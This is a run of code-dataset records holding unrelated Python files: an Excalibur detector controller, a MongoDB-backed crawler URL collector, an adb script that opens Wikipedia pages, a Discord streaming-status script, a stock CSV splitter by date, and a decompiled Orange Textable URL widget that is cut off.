tp_enable = self._param['config/test_pulse_enable']\n logging.info(' Setting test pulse enable to {}'.format(tp_enable.value))\n write_params.append(ExcaliburParameter('testpulse_enable', [[tp_enable.index]]))\n\n write_params.append(ExcaliburParameter('num_frames_to_acquire', [[num_frames]]))\n\n # Record the number of frames for this acquisition\n self._acq_frame_count = num_frames\n\n # Record the acquisition exposure time\n self._acq_exposure = self._param['config/exposure_time'].value\n\n acquisition_time = int(self._param['config/exposure_time'].value * 1000.0)\n logging.info(' Setting acquisition time to {} ms'.format(acquisition_time))\n write_params.append(ExcaliburParameter('acquisition_time', [[acquisition_time]]))\n\n trigger_mode = self._param['config/trigger_mode']\n logging.info(' Setting trigger mode to {}'.format(trigger_mode.value))\n write_params.append(ExcaliburParameter('mpx3_externaltrigger', [[trigger_mode.index]]))\n\n trigger_polarity = self._param['config/trigger_polarity']\n logging.info(' Setting trigger polarity to {}'.format(trigger_polarity.value))\n write_params.append(ExcaliburParameter('mpx3_triggerpolarity', [[trigger_polarity.index]]))\n\n read_write_mode = self._param['config/read_write_mode']\n logging.info(' Setting ASIC readout mode to {}'.format(read_write_mode.value))\n write_params.append(ExcaliburParameter('mpx3_readwritemode', [[read_write_mode.index]]))\n\n colour_mode = self._param['config/colour_mode']\n logging.info(' Setting ASIC colour mode to {} '.format(colour_mode.value))\n write_params.append(ExcaliburParameter('mpx3_colourmode', [[colour_mode.index]]))\n\n csmspm_mode = self._param['config/csm_spm_mode']\n logging.info(' Setting ASIC pixel mode to {} '.format(csmspm_mode.value))\n write_params.append(ExcaliburParameter('mpx3_csmspmmode', [[csmspm_mode.index]]))\n\n equalization_mode = self._param['config/equalization_mode']\n logging.info(' Setting ASIC equalization mode to {} '.format(equalization_mode.value))\n write_params.append(ExcaliburParameter('mpx3_equalizationmode', [[equalization_mode.index]]))\n\n gain_mode = self._param['config/gain_mode']\n logging.info(' Setting ASIC gain mode to {} '.format(gain_mode.value))\n write_params.append(ExcaliburParameter('mpx3_gainmode', [[gain_mode.index]]))\n\n counter_select = self._param['config/counter_select'].value\n logging.info(' Setting ASIC counter select to {} '.format(counter_select))\n write_params.append(ExcaliburParameter('mpx3_counterselect', [[counter_select]]))\n\n counter_depth = self._param['config/counter_depth'].value\n logging.info(' Setting ASIC counter depth to {} bits'.format(counter_depth))\n write_params.append(ExcaliburParameter('mpx3_counterdepth',\n [[ExcaliburDefinitions.FEM_COUNTER_DEPTH_MAP[counter_depth]]]))\n\n disc_csm_spm = self._param['config/disc_csm_spm']\n int_counter_depth = ExcaliburDefinitions.FEM_COUNTER_DEPTH_MAP[counter_depth]\n csm_spm_value = ExcaliburDefinitions.DISC_SPM_CSM_TABLE[int_counter_depth][csmspm_mode.index][disc_csm_spm.index][read_write_mode.index][counter_select]\n logging.info(' Setting ASIC discriminator output mode to {} '.format(csm_spm_value))\n write_params.append(ExcaliburParameter('mpx3_disccsmspm', [[csm_spm_value]]))\n\n logging.info(' Setting operation mode to {}'.format(operation_mode.value))\n write_params.append(ExcaliburParameter('mpx3_operationmode', [[operation_mode.index]]))\n\n lfsr_bypass = self._param['config/lfsr_bypass']\n logging.info(' Setting LFSR bypass mode to {}'.format(lfsr_bypass.value))\n write_params.append(ExcaliburParameter('mpx3_lfsrbypass', [[lfsr_bypass.index]]))\n\n #\n # if self.args.matrixread:\n # lfsr_bypass_mode = ExcaliburDefinitions.FEM_LFSR_BYPASS_MODE_ENABLED\n # else:\n # lfsr_bypass_mode = ExcaliburDefinitions.FEM_LFSR_BYPASS_MODE_DISABLED\n #\n #logging.info(' Setting data interface address and port parameters')\n #write_params.append(ExcaliburParameter('source_data_addr', [[addr] for addr in self.source_data_addr]))\n #write_params.append(ExcaliburParameter('source_data_mac', [[mac] for mac in self.source_data_mac]))\n #write_params.append(ExcaliburParameter('source_data_port', [[port] for port in self.source_data_port]))\n #write_params.append(ExcaliburParameter('dest_data_addr', [[addr] for addr in self.dest_data_addr]))\n #write_params.append(ExcaliburParameter('dest_data_mac', [[mac] for mac in self.dest_data_mac]))\n #write_params.append(ExcaliburParameter('dest_data_port', [[port] for port in self.dest_data_port]))\n\n logging.info(' Disabling local data receiver thread')\n write_params.append(ExcaliburParameter('datareceiver_enable', [[0]]))\n\n # Connect to the hardware\n # self.connect({'state': True})\n\n if self._24bit_mode:\n self._24bit_params = write_params\n # Create and queue the command object\n cmd = {\n 'path': 'command/24bit_acquire',\n 'data': {}\n }\n self.queue_command(cmd)\n\n else:\n # Write all the parameters to system\n logging.info('Writing configuration parameters to system {}'.format(str(write_params)))\n self.hl_write_params(write_params)\n\n self._frame_start_count = 0\n self._frame_count_time = None\n\n # Send start acquisition command\n logging.info('Sending start acquisition command')\n self.hl_start_acquisition()\n logging.info('Start acquisition completed')\n\n def hl_do_24bit_acquisition(self):\n logging.info('24 bit mode acquisition loop entered...')\n for acq_loop in range(self._acquisition_loops):\n\n self._frame_start_count = 0\n self._frame_count_time = None\n\n logging.info(\n 'Executing acquisition loop {} of {}...'.format(acq_loop + 1, self._acquisition_loops)\n )\n\n # Write all the parameters to system\n logging.info('Writing configuration parameters to system')\n self.hl_write_params(self._24bit_params)\n\n # Send start acquisition command\n logging.info('Sending part 1 start acquisition command')\n self.hl_start_acquisition()\n\n logging.info(\"Waiting for part 1 acquisition to complete\")\n self.wait_for_24bit_acquisition_completion(0x40000000)\n logging.info(\"Part 1 acquisition has completed\")\n\n self.do_c0_matrix_read()\n logging.info('Acquisition of 24 bit frame completed')\n\n # Holding the standard acquiring flag true until all loops have completed\n self._acquiring = False\n # Reset 24bit mode flag so that fast read can read\n self._24bit_mode = False\n logging.info(\"Completed {} acquisition loops\".format(self._acquisition_loops))\n\n def do_c0_matrix_read(self):\n logging.info('Performing a C0 matrix read for 24 bit mode')\n\n c0_read_params = []\n c0_read_params.append(ExcaliburParameter(\n 'mpx3_operationmode', [[ExcaliburDefinitions.FEM_OPERATION_MODE_MAXTRIXREAD]]\n ))\n # Reset counter select back to C0\n self._param['config/counter_select'].set_value(0, callback=False)\n\n c0_read_params.append(ExcaliburParameter('mpx3_counterselect', [[0]]))\n c0_read_params.append(ExcaliburParameter('num_frames_to_acquire', [[1]]))\n c0_read_params.append(ExcaliburParameter('mpx3_lfsrbypass', [[0]]))\n\n logging.info(\"Sending configuration parameters for C0 matrix read\")\n self.hl_write_params(c0_read_params)\n\n logging.info(\"Sending part 2 start acquisition command\")\n self.hl_start_acquisition()\n\n logging.info(\"Waiting for part 2 acquisition to complete\")\n self.wait_for_24bit_acquisition_completion(0x1f)\n logging.info(\"Part 2 acquisition has completed\")\n\n\n def wait_for_24bit_acquisition_completion(self, acq_completion_state_mask):\n fem_params = ['frames_acquired', 'control_state']\n while True:\n read_params = ExcaliburReadParameter(fem_params)\n cmd_ok, err_msg, vals = self.hl_read_params(read_params)\n\n acq_completed = all(\n [((state & acq_completion_state_mask) == acq_completion_state_mask) for state in vals['control_state']]\n )\n if acq_completed:\n break\n\n self.hl_stop_acquisition()\n\n def hl_initialise(self):\n logging.info(\"Initialising front end...\")\n for fem in self._fems:\n self.set_calibration_status(fem, 0)\n logging.info(\"Sending a fe_vdd_enable param set to 1\")\n params = []\n params.append(ExcaliburParameter('fe_vdd_enable', [[1]], fem=self.powercard_fem_idx+1))\n self.hl_write_params(params)\n logging.info(\"Sending the fe_init command\")\n self.hl_do_command('fe_init')\n logging.info(\"Sending a stop acquisition\")\n return self.hl_stop_acquisition()\n\n def hl_toggle_lv(self):\n logging.info(\"Toggling lv_enable 1,0\")\n for fem in self._fems:\n self.set_calibration_status(fem, 0)\n if self.powercard_fem_idx < 0:\n self.set_error(\"Unable to toggle LV enable as server reports no power card\")\n return\n params = [ExcaliburParameter('fe_lv_enable', [[1]], fem=self.powercard_fem_idx+1)]\n self.hl_write_params(params)\n params = [ExcaliburParameter('fe_lv_enable', [[0]], fem=self.powercard_fem_idx+1)]\n self.hl_write_params(params)\n\n def hl_lv_enable(self, name, lv_enable):\n logging.info(\"Setting lv_enable to %d\", lv_enable)\n for fem in self._fems:\n self.set_calibration_status(fem, 0)\n if self.powercard_fem_idx < 0:\n self.set_error(\"Unable to set LV enable [] as server reports no power card\".format(name))\n return\n params = []\n params.append(ExcaliburParameter('fe_lv_enable', [[lv_enable]], fem=self.powercard_fem_idx+1))\n self.hl_write_params(params)\n if lv_enable == 1:\n self.hl_initialise()\n\n def hl_hv_enable(self, name, hv_enable):\n logging.info(\"Setting hv_enable to %d\", hv_enable)\n if self.powercard_fem_idx < 0:\n self.set_error(\"Unable to set HV enable [] as server reports no power card\".format(name))\n return\n params = []\n params.append(ExcaliburParameter('fe_hv_enable', [[hv_enable]], fem=self.powercard_fem_idx+1))\n self.hl_write_params(params)\n\n def hl_hv_bias_set(self, name, value):\n if self.powercard_fem_idx < 0:\n self.set_error(\"Unable to set HV bias [] as server reports no power card\".format(name))\n return\n params = []\n params.append(ExcaliburParameter('fe_hv_bias', [[float(value)]], fem=self.powercard_fem_idx+1))\n self.hl_write_params(params)\n\n def hl_start_acquisition(self):\n with self._comms_lock:\n self.do_command('start_acquisition', None)\n return self.wait_for_completion()\n\n def hl_stop_acquisition(self):\n with self._comms_lock:\n self._acquiring = False\n self.do_command('stop_acquisition', None)\n return self.wait_for_completion()\n\n def hl_do_command(self, command):\n logging.debug(\"Do command: {}\".format(command))\n with self._comms_lock:\n self.do_command(command, None)\n return self.wait_for_completion()\n\n def hl_write_params(self, params):\n logging.debug(\"Writing params: {}\".format(params))\n with self._comms_lock:\n self.write_fe_param(params)\n return self.wait_for_completion()\n\n def hl_read_params(self, params):\n values = None\n with self._comms_lock:\n self.read_fe_param(params)\n cmd_ok, err_msg = self.wait_for_read_completion()\n if cmd_ok:\n values = super(HLExcaliburDetector, self).get('command')['command']['fe_param_read']['value']\n return (cmd_ok, err_msg, values)\n\n def hl_efuseid_read(self):\n response_status = 0\n efuse_dict = {'efuseid_c0': [],\n 'efuseid_c1': [],\n 'efuseid_c2': [],\n 'efuseid_c3': [],\n 'efuseid_c4': [],\n 'efuseid_c5': [],\n 'efuseid_c6': [],\n 'efuseid_c7': [],\n 'efuse_match': []}\n if self._param['config/cal_file_root'].value != '':\n try:\n # First read out the efuse values from the files\n recorded_efuses = {}\n for fem in self._fems:\n efid_parser = ExcaliburEfuseIDParser()\n filename = self._param['config/cal_file_root'].value + \"/fem\" + str(fem) + '/efuseIDs'\n efid_parser.parse_file(filename)\n recorded_efuses[fem] = efid_parser.efuse_ids\n logging.debug(\"EfuseIDs read from file: %s\", recorded_efuses)\n fe_params = ['efuseid']\n read_params = ExcaliburReadParameter(fe_params)\n self.read_fe_param(read_params)\n\n while True:\n time.sleep(0.1)\n if not self.command_pending():\n if self._get('command_succeeded'):\n logging.info(\"Command has succeeded\")\n status = super(HLExcaliburDetector, self).get('command')['command']['fe_param_read']['value']\n fem = 1\n for efuse in status['efuseid']:\n id_match = 1\n efuse_dict['efuseid_c0'].append(efuse[0])\n if recorded_efuses[fem][1] != efuse[0]:\n id_match = 0\n efuse_dict['efuseid_c1'].append(efuse[1])\n if recorded_efuses[fem][2] != efuse[1]:\n id_match = 0\n efuse_dict['efuseid_c2'].append(efuse[2])\n if recorded_efuses[fem][3] != efuse[2]:\n id_match = 0\n efuse_dict['efuseid_c3'].append(efuse[3])\n if recorded_efuses[fem][4] != efuse[3]:\n id_match = 0\n efuse_dict['efuseid_c4'].append(efuse[4])\n if recorded_efuses[fem][5] != efuse[4]:\n id_match = 0\n efuse_dict['efuseid_c5'].append(efuse[5])\n if recorded_efuses[fem][6] != efuse[5]:\n id_match = 0\n efuse_dict['efuseid_c6'].append(efuse[6])\n if recorded_efuses[fem][7] != efuse[6]:\n id_match = 0\n efuse_dict['efuseid_c7'].append(efuse[7])\n if recorded_efuses[fem][8] != efuse[7]:\n id_match = 0\n efuse_dict['efuse_match'].append(id_match)\n fem += 1\n break\n except:\n # Unable to get the efuse IDs so set the dict up with None vales\n response_status = -1\n for efuse_name in efuse_dict:\n efuse_dict[efuse_name].append(None)\n else:\n response_status = -1\n logging.debug(\"No EFUSE ID root directory supplied\")\n \n logging.debug(\"EFUSE: %s\", efuse_dict)\n return response_status, efuse_dict\n\n def get_fem_error_state(self):\n fem_state = self.get('status/fem')['fem']\n logging.debug(\"%s\", fem_state)\n for (idx, state) in enumerate(fem_state):\n yield (idx, state['id'], state['error_code'], state['error_msg'])\n\n def wait_for_completion(self):\n succeeded = False\n err_msg = ''\n try:\n while True:\n time.sleep(0.1)\n if not self.get('status/command_pending')['command_pending']:\n succeeded = self.get('status/command_succeeded')['command_succeeded']\n if succeeded:\n pass\n else:\n logging.error('Command write_fe_param failed on following FEMS:')\n fem_error_count = 0\n for (idx, fem_id, error_code, error_msg) in self.get_fem_error_state():\n if error_code != 0:\n logging.error(\n ' FEM idx {} id {} : {} : {}'.format(idx, fem_id, error_code, error_msg))\n fem_error_count += 1\n err_msg = 'Command write_fe_param failed on {} FEMs'.format(fem_error_count)\n break\n\n except ExcaliburDetectorError as e:\n err_msg = str(e)\n\n if not succeeded:\n self.set_error(err_msg)\n\n return succeeded, err_msg\n\n def wait_for_read_completion(self):\n succeeded = False\n err_msg = ''\n try:\n while True:\n time.sleep(0.1)\n if not self.get('status/command_pending')['command_pending']:\n succeeded = self.get('status/command_succeeded')['command_succeeded']\n if succeeded:\n pass\n else:\n logging.error('Command read_fe_param failed on following FEMS:')\n fem_error_count = 0\n for (idx, fem_id, error_code, error_msg) in self.get_fem_error_state():\n if error_code != 0:\n logging.error(\n ' FEM idx {} id {} : {} : {}'.format(idx, fem_id, error_code, error_msg))\n fem_error_count += 1\n err_msg = 'Command read_fe_param failed on {} FEMs'.format(fem_error_count)\n break\n\n except ExcaliburDetectorError as e:\n err_msg = str(e)\n\n if not succeeded:\n self.set_error(err_msg)\n\n return succeeded, err_msg\n","sub_path":"control/excalibur/hl_detector.py","file_name":"hl_detector.py","file_ext":"py","file_size_in_byte":81540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"595268363","text":"# -*- coding: utf-8 -*-\r\n'''\r\nCreated on 2016-12-23 11:24\r\n---------\r\n@summary: url 管理器 负责取url 存储在环形的urls列表中\r\n---------\r\n@author: Boris\r\n'''\r\nimport sys\r\nsys.path.append('..')\r\nimport init\r\nimport threading\r\nimport base.constance as Constance\r\nimport utils.tools as tools\r\nfrom db.mongodb import MongoDB\r\nfrom utils.log import log\r\nimport time\r\n\r\nclass Collector(threading.Thread):\r\n def __init__(self, tab_urls):\r\n super(Collector, self).__init__()\r\n self._lock = threading.RLock()\r\n\r\n self._db = MongoDB()\r\n self._thread_stop = False\r\n self._urls =[]\r\n self._null_times = 0\r\n self._tab_urls = tab_urls\r\n self._depth = int(tools.get_conf_value('config.conf', \"collector\", \"depth\"))\r\n self._max_size = int(tools.get_conf_value('config.conf', \"collector\", \"max_size\"))\r\n self._interval = int(tools.get_conf_value('config.conf', \"collector\", \"sleep_time\"))\r\n self._allowed_null_times = int(tools.get_conf_value('config.conf', \"collector\", 'allowed_null_times'))\r\n self._url_count = int(tools.get_conf_value('config.conf', \"collector\", \"url_count\"))\r\n\r\n #初始时将正在做的任务至为未做\r\n self._db.update(self._tab_urls, {'status':Constance.DOING}, {'status':Constance.TODO})\r\n\r\n self._finished_callback = None\r\n\r\n def run(self):\r\n while not self._thread_stop:\r\n self.__input_data()\r\n time.sleep(self._interval)\r\n\r\n def stop(self):\r\n self._thread_stop = True\r\n if self._finished_callback:\r\n self._finished_callback()\r\n\r\n # @tools.log_function_time\r\n def __input_data(self):\r\n if len(self._urls) > self._url_count:\r\n return\r\n\r\n urls_list = []\r\n if self._depth:\r\n urls_list = self._db.find(self._tab_urls, {\"status\":Constance.TODO, \"depth\":{\"$lte\":self._depth}}, limit = self._url_count)\r\n else:\r\n urls_list = self._db.find(self._tab_urls, {\"status\":Constance.TODO}, limit = self._url_count)\r\n\r\n #更新已取到的url状态为doing\r\n for url in urls_list:\r\n self._db.update(self._tab_urls, url, {'status':Constance.DOING})\r\n\r\n # 存url\r\n self.put_urls(urls_list)\r\n\r\n if self.is_all_have_done():\r\n print('is_all_have_done')\r\n self.stop()\r\n\r\n def is_finished(self):\r\n return self._thread_stop\r\n\r\n def add_finished_callback(self, callback):\r\n self._finished_callback = callback\r\n\r\n # 没有可做的url\r\n def is_all_have_done(self):\r\n print('判断是否有未做的url ')\r\n if len(self._urls) == 0:\r\n self._null_times += 1\r\n if self._null_times >= self._allowed_null_times:\r\n #检查数据库中有没有正在做的url\r\n urls_doing = self._db.find(self._tab_urls, {'status':Constance.DOING})\r\n if urls_doing: # 如果有未做的url 且数量有变化,说明没有卡死\r\n print('有未做的url %s'%len(urls_doing))\r\n self._null_times = 0\r\n return False\r\n else:\r\n return True\r\n else:\r\n return False\r\n else:\r\n self._null_times = 0\r\n return False\r\n\r\n\r\n # @tools.log_function_time\r\n def put_urls(self, urls_list):\r\n self._urls.extend(urls_list)\r\n\r\n # @tools.log_function_time\r\n def get_urls(self, count):\r\n self._lock.acquire() #加锁\r\n\r\n urls = self._urls[:count]\r\n del self._urls[:count]\r\n\r\n self._lock.release()\r\n\r\n return urls\r\n\r\nif __name__ == '__main__':\r\n # collector = Collector('news_urls')\r\n # url = collector.get_urls(20)\r\n # print(url)\r\n pass","sub_path":"worker/base/collector.py","file_name":"collector.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"589783740","text":"import datetime\nimport subprocess\nimport time\n\ndef print_timestamp():\n\treturn datetime.datetime.now().strftime('%Y-%m-%d.%H%M%S')\n\nyoutube_sites =[\"https://www.youtube.com/watch?v=Lamg_hJVW_U\", # 0:32\n \"https://www.youtube.com/watch?v=VESKjoxAmZg\", # 0:33\n \"https://www.youtube.com/watch?v=YVyWObJY9FQ\", # 0:55\n \"https://www.youtube.com/watch?v=iWC-2nKAgic\", # 1:16\n \"https://www.youtube.com/watch?v=bbThSb2DImk\", # 1:41\n \"https://www.youtube.com/watch?v=NDyYvpqp46w\", # 2:21\n ]\n\nwebsites_lists =[\"https://www.youtube.com/watch?v=Lamg_hJVW_U\", # 0:32\n \"https://www.youtube.com/watch?v=VESKjoxAmZg\", # 0:33\n \"https://www.youtube.com/watch?v=YVyWObJY9FQ\", # 0:55\n \"https://www.youtube.com/watch?v=iWC-2nKAgic\", # 1:16\n \"https://www.youtube.com/watch?v=bbThSb2DImk\", # 1:41\n \"https://www.youtube.com/watch?v=NDyYvpqp46w\", # 2:21\n ]\n\n#https://en.m.wikipedia.org/wiki/1945\nwebsites_lists =[\"https://en.m.wikipedia.org/wiki/\" + str(i) for i in range (1850,2017)]\n\nsleep_duration = 15\ntotal_duration_in_min = 30\n\ndef adb_sites(webpage):\n print(print_timestamp() + \" \" + \"---Browsing \" + webpage)\n start_webpage_command = \"adb shell am start -a android.intent.action.VIEW -d \" + webpage\n start_webpage_command_list = start_webpage_command.split()\n #print(\"start_webpage_command_list = \" + str(start_webpage_command_list))\n p=subprocess.Popen(start_webpage_command_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n print(\"start_webpage Command Status = \" + p.communicate()[0])\n\n\n#Main Part of Program\ntimestart = datetime.datetime.now()\nprint(str(timestart) + \"--Waiting for device\")\nsubprocess.Popen([\"adb wait-for-device root\",\"\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\n\ntime.sleep(5)\n#lapsed_duration = (datetime.datetime.now()-timestart).minute\ntimesince = datetime.datetime.now() - timestart\nminutessince = int(timesince.total_seconds() / 60)\n\nwhile minutessince < total_duration_in_min:\n for webpage in websites_lists:\n #print(webpage)\n adb_sites(webpage)\n time.sleep(sleep_duration)\n timesince = datetime.datetime.now() - timestart\n minutessince = int(timesince.total_seconds() / 60)\n print(\"Elapsed min = \"+str(minutessince))\n","sub_path":"adb_runApps.py","file_name":"adb_runApps.py","file_ext":"py","file_size_in_byte":2395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"584216779","text":"import discord\r\n\r\nclient = discord.Client()\r\ntoken = \"Discord Token\"\r\ntitle = \"Hello hi hi\"\r\nurl = \"https://twitch.tv/meowcat\"\r\n\r\n@client.event\r\nasync def on_ready():\r\n print(f\" started\\n Title: {title}\\n Url: {url}\")\r\n await client.change_presence(activity=discord.Streaming(name=f\"{title}\", url=f\"{url}\"))\r\n\r\nclient.run(token, bot=False)\r\n","sub_path":"streamingstatus.py","file_name":"streamingstatus.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"48946029","text":"import glob\nimport os\nimport re\nimport time\n\nfolder_path = 'C:\\\\Users\\\\amdge\\\\Desktop\\\\ssd'\ncount = 1\nprint(\"Copying...\")\nfor filename in glob.glob(os.path.join(folder_path, '*.csv')):\n\n with open(filename, \"r\") as f: # open csv as f\n x = re.match(r\"(C:\\\\Users\\\\amdge\\\\Desktop\\\\ssd)\\\\(.*).csv\", filename)\n text = f.read()\n StockLines = text.split(\"\\n\")\n i = 1\n start = time.time()\n r = re.match(\"(\\d{4}-\\d{2}-\\d{2}),(.*)\", StockLines[i])\n olddt = r.group(1)\n with open(\"C:\\\\Users\\\\amdge\\\\Desktop\\\\DATEWISE\\\\\" + r.group(1) + \".txt\", \"a+\") as fj: # open first date as fj\n if count == 1:\n fj.write(\"Time,Open,High,Low,Close,Volume,Stock\\n\")\n\n while StockLines[i] != \"\\0\":\n\n # Counter += 1\n # print(CoList[i])\n r = re.match(\"(\\d{4}-\\d{2}-\\d{2}),(.*)\", StockLines[i])\n if r:\n newdt = r.group(1)\n if olddt != newdt:\n olddt = r.group(1)\n # fj.close()\n fj = open(\"C:\\\\Users\\\\amdge\\\\Desktop\\\\DATEWISE\\\\\" + olddt + \".txt\", \"a+\")\n if count == 1:\n fj.write(\"Time,Open,High,Low,Close,Volume,Stock\\n\")\n continue\n fj.write(r.group(2) + \",\" + x.group(2) + \"\\n\")\n i += 1\n else:\n # fj.close()\n break\n # f.close()\n end = time.time()\n print(\n \"Completed for \" + x.group(2) + \" stock\" + \". Execution time: \" + str(round((end - start), 2)) + \" seconds\")\n count = 2\nprint(\"Copied all files\")\n ","sub_path":"datewise.py","file_name":"datewise.py","file_ext":"py","file_size_in_byte":1745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"18228437","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build\\bdist.win32\\egg\\_textable\\widgets\\OWTextableURLs.py\n# Compiled at: 2016-08-11 09:23:10\n\"\"\"\nClass OWTextableURLs\nCopyright 2012-2016 LangTech Sarl (info@langtech.ch)\n-----------------------------------------------------------------------------\nThis file is part of the Orange-Textable package v2.0.\n\nOrange-Textable v2.0 is free software: you can redistribute it and/or modify\nit under the terms of the GNU General Public License as published by\nthe Free Software Foundation, either version 3 of the License, or\n(at your option) any later version.\n\nOrange-Textable v2.0 is distributed in the hope that it will be useful,\nbut WITHOUT ANY WARRANTY; without even the implied warranty of\nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\nGNU General Public License for more details.\n\nYou should have received a copy of the GNU General Public License\nalong with Orange-Textable v2.0. If not, see .\n\"\"\"\n__version__ = '0.14.2'\nimport codecs, urllib, re, json\nfrom unicodedata import normalize\nfrom LTTL.Segmentation import Segmentation\nfrom LTTL.Input import Input\nimport LTTL.Segmenter as Segmenter\nfrom TextableUtils import *\nfrom Orange.OrangeWidgets.OWWidget import *\nimport OWGUI\n\nclass OWTextableURLs(OWWidget):\n \"\"\"Orange widget for fetching text from URLs\"\"\"\n settingsList = [\n 'URLs',\n 'encoding',\n 'autoSend',\n 'autoNumber',\n 'autoNumberKey',\n 'importURLs',\n 'importURLsKey',\n 'displayAdvancedSettings',\n 'lastLocation',\n 'URL',\n 'uuid']\n\n def __init__(self, parent=None, signalManager=None):\n OWWidget.__init__(self, parent, signalManager, wantMainArea=0, wantStateInfoWidget=0)\n self.inputs = [\n (\n 'Message', JSONMessage, self.inputMessage, Single)]\n self.outputs = [\n (\n 'Text data', Segmentation)]\n self.URLs = list()\n self.encoding = 'utf-8'\n self.autoSend = True\n self.autoNumber = False\n self.autoNumberKey = 'num'\n self.importURLs = True\n self.importURLsKey = 'url'\n self.lastLocation = '.'\n self.displayAdvancedSettings = False\n self.URL = ''\n self.uuid = None\n self.loadSettings()\n self.uuid = getWidgetUuid(self)\n self.segmentation = None\n self.createdInputs = list()\n self.URLLabel = list()\n self.selectedURLLabel = list()\n self.newURL = ''\n self.newAnnotationKey = ''\n self.newAnnotationValue = ''\n self.infoBox = InfoBox(widget=self.controlArea)\n self.sendButton = SendButton(widget=self.controlArea, master=self, callback=self.sendData, infoBoxAttribute='infoBox', sendIfPreCallback=self.updateGUI)\n self.advancedSettings = AdvancedSettings(widget=self.controlArea, master=self, callback=self.sendButton.settingsChanged)\n self.advancedSettings.draw()\n basicURLBox = OWGUI.widgetBox(widget=self.controlArea, box='Source', orientation='vertical')\n basicURLBoxLine1 = OWGUI.widgetBox(widget=basicURLBox, box=False, orientation='horizontal')\n OWGUI.lineEdit(widget=basicURLBoxLine1, master=self, value='URL', orientation='horizontal', label='URL:', labelWidth=101, callback=self.sendButton.settingsChanged, tooltip='The URL whose content will be imported.')\n OWGUI.separator(widget=basicURLBox, height=3)\n OWGUI.comboBox(widget=basicURLBox, master=self, value='encoding', items=getPredefinedEncodings(), sendSelectedValue=True, orientation='horizontal', label='Encoding:', labelWidth=101, callback=self.sendButton.settingsChanged, tooltip=\"Select URL's encoding.\")\n OWGUI.separator(widget=basicURLBox, height=3)\n self.advancedSettings.basicWidgets.append(basicURLBox)\n self.advancedSettings.basicWidgetsAppendSeparator()\n URLBox = OWGUI.widgetBox(widget=self.controlArea, box='Sources', orientation='vertical')\n URLBoxLine1 = OWGUI.widgetBox(widget=URLBox, box=False, orientation='horizontal', addSpace=True)\n self.fileListbox = OWGUI.listBox(widget=URLBoxLine1, master=self, value='selectedURLLabel', labels='URLLabel', callback=self.updateURLBoxButtons, tooltip='The list of URLs whose content will be imported.\\n\\nIn the output segmentation, the content of each\\nURL appears in the same position as in the list.\\n\\nColumn 1 shows the URL.\\nColumn 2 shows the associated annotation (if any).\\nColumn 3 shows the associated encoding.')\n font = QFont()\n font.setFamily('Courier')\n font.setStyleHint(QFont.Courier)\n font.setPixelSize(12)\n self.fileListbox.setFont(font)\n URLBoxCol2 = OWGUI.widgetBox(widget=URLBoxLine1, orientation='vertical')\n self.moveUpButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Move Up', callback=self.moveUp, tooltip='Move the selected URL upward in the list.')\n self.moveDownButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Move Down', callback=self.moveDown, tooltip='Move the selected URL downward in the list.')\n self.removeButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Remove', callback=self.remove, tooltip='Remove the selected URL from the list.')\n self.clearAllButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Clear All', callback=self.clearAll, tooltip='Remove all URLs from the list.')\n self.exportButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Export List', callback=self.exportList, tooltip='Open a dialog for selecting a file where the URL\\nlist can be exported in JSON format.')\n self.importButton = OWGUI.button(widget=URLBoxCol2, master=self, label='Import List', callback=self.importList, tooltip='Open a dialog for selecting an URL list to\\nimport (in JSON format). URLs from this list will\\nbe added to those already imported.')\n URLBoxLine2 = OWGUI.widgetBox(widget=URLBox, box=False, orientation='vertical')\n addURLBox = OWGUI.widgetBox(widget=URLBoxLine2, box=True, orientation='vertical')\n OWGUI.lineEdit(widget=addURLBox, master=self, value='newURL', orientation='horizontal', label='URL(s):', labelWidth=101, callback=self.updateGUI, tooltip=\"The URL(s) that will be added to the list when\\nbutton 'Add' is clicked.\\n\\nSuccessive URLs must be separated with ' / ' \\n(space + slash + space). Their order in the list\\n will be the same as in this field.\")\n OWGUI.separator(widget=addURLBox, height=3)\n OWGUI.comboBox(widget=addURLBox, master=self, value='encoding', items=getPredefinedEncodings(), sendSelectedValue=True, orientation='horizontal', label='Encoding:', labelWidth=101, callback=self.updateGUI, tooltip=\"Select URL's encoding.\")\n OWGUI.separator(widget=addURLBox, height=3)\n OWGUI.lineEdit(widget=addURLBox, master=self, value='newAnnotationKey', orientation='horizontal', label='Annotation key:', labelWidth=101, callback=self.updateGUI, tooltip='This field lets you specify a custom annotation\\nkey associated with each URL that is about to be\\nadded to the list.')\n OWGUI.separator(widget=addURLBox, height=3)\n OWGUI.lineEdit(widget=addURLBox, master=self, value='newAnnotationValue', orientation='horizontal', label='Annotation value:', labelWidth=101, callback=self.updateGUI, tooltip='This field lets you specify the annotation value\\nassociated with the above annotation key.')\n OWGUI.separator(widget=addURLBox, height=3)\n self.addButton = OWGUI.button(widget=addURLBox, master=self, label='Add', callback=self.add, tooltip=\"Add the URL currently displayed in the 'URL'\\ntext field to the list.\")\n self.advancedSettings.advancedWidgets.append(URLBox)\n self.advancedSettings.advancedWidgetsAppendSeparator()\n optionsBox = OWGUI.widgetBox(widget=self.controlArea, box='Options', orientation='vertical')\n optionsBoxLine1 = OWGUI.widgetBox(widget=optionsBox, box=False, orientation='horizontal')\n OWGUI.checkBox(widget=optionsBoxLine1, master=self, value='importURLs', label='Import URLs with key:', labelWidth=180, callback=self.sendButton.settingsChanged, tooltip='Import URLs as annotations.')\n self.importURLsKeyLineEdit = 